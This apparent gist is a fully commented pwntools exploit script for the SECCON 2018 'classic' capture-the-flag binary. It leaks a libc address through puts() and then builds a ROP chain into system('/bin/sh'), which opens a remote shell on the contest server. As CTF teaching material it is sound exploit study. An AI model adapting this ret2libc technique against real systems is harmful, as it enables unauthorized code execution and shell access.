@LoadLow
Created October 28, 2018 06:50
SECCON 2018 - Classic elf64 ROP with ASLR + NX bit
from pwn import *
from struct import *
# Distance in bytes from the start of the overflowed stack buffer to the
# saved return address ("saved EIP"/RIP) that both payloads in main() target.
# Presumably the buffer size plus the saved frame pointer on amd64 — confirm
# against the binary; the two stages below depend on this value being exact.
seip_offset = 0x48  # decimal 72
def main():
    """Two-stage ret2libc chain against the SECCON 2018 "classic" binary.

    Stage 1 overwrites the saved return address after ``seip_offset`` bytes
    of buffer and returns into puts(&gets@GOT) to leak one libc pointer, then
    returns into main() so the same overflow can be triggered a second time.
    Stage 2 uses the leak to rebase ``libc`` and returns into system() with
    the "/bin/sh" string found inside libc.  All target knowledge comes from
    the two files under samples/ and the hard-coded remote host below.

    What the chain relies on is also what would have stopped it: the binary
    is not PIE (GOT, puts, main and the gadget are used at their static
    addresses) and has no stack canary (an overwritten return address is
    reached without -fstack-protector aborting first).  NX is present, which
    is why the chain is pure ROP rather than stack shellcode.
    """
    context(arch='amd64', os='linux')  # ABI for pwntools' ROP/pack helpers
    # ASLR + NX bit: libc base must be leaked at run time, no executable stack.
    binary = ELF("samples/classic.elf64")
    libc = ELF("samples/libc-2.23.so")  # must be the same build as the remote libc
    rop = ROP(binary)
    r = remote("classic.pwn.seccon.jp", 17354)
    r.recvuntil("Local Buffer >> ")
    # Stage 1: leak the glibc address of gets() via puts(GOT['gets']).
    # Payloads are Python 2 str (pack() output only concatenates with str on
    # Python 2), so '\x00' below is a raw byte, not a text character.
    pld = 'J' * seip_offset                     # filler up to the saved return address
    pld += pack("<Q", rop.rdi.address)          # pop rdi; ret;
    pld += pack("<Q", binary.got['gets'])       # rdi = &gets@GOT
    pld += pack("<Q", binary.symbols['puts'])   # puts(rdi) prints the resolved pointer
    pld += pack("<Q", binary.symbols['main'])   # saved RIP => main(), allows a second overflow
    r.sendline(pld)
    r.readline()  # consume one line before the leak — presumably the program's echo; verify against the binary
    # Rebase libc: leaked pointer minus the gets() offset in the local libc copy.
    # readline() keeps its trailing newline (the positional 8 lands in its
    # keepends parameter, not a length — the [:8] slice does the bounding);
    # strip() removes the newline (and any other whitespace-valued byte at
    # either end), and ljust() zero-pads the leak up to the 8 bytes '<Q' needs,
    # since puts() stops at the first NUL of the pointer.
    libc.address = struct.unpack('<Q', r.readline(8)[:8].strip().ljust(8, '\x00'))[0] - libc.symbols['gets']
    # Stage 2: same overflow, now returning into libc's system("/bin/sh").
    pld = 'J' * seip_offset
    pld += pack("<Q", rop.rdi.address)          # pop rdi; ret;
    pld += pack("<Q", next(libc.search('/bin/sh\x00')))  # rdi = first "/bin/sh\0" inside libc
    pld += pack("<Q", libc.symbols['system'])   # system()
    pld += pack("<Q", libc.symbols['exit'])     # saved RIP => exit(), so the process ends cleanly
    r.sendline(pld)
    r.readuntil("Have a nice pwn!!\n")
    # Hand the remote shell's stdin/stdout over to the user.
    r.success("pwned !")
    r.interactive("/bin/sh$ ")
if __name__ == '__main__':
    # Run only when executed as a script, never on import.
    main()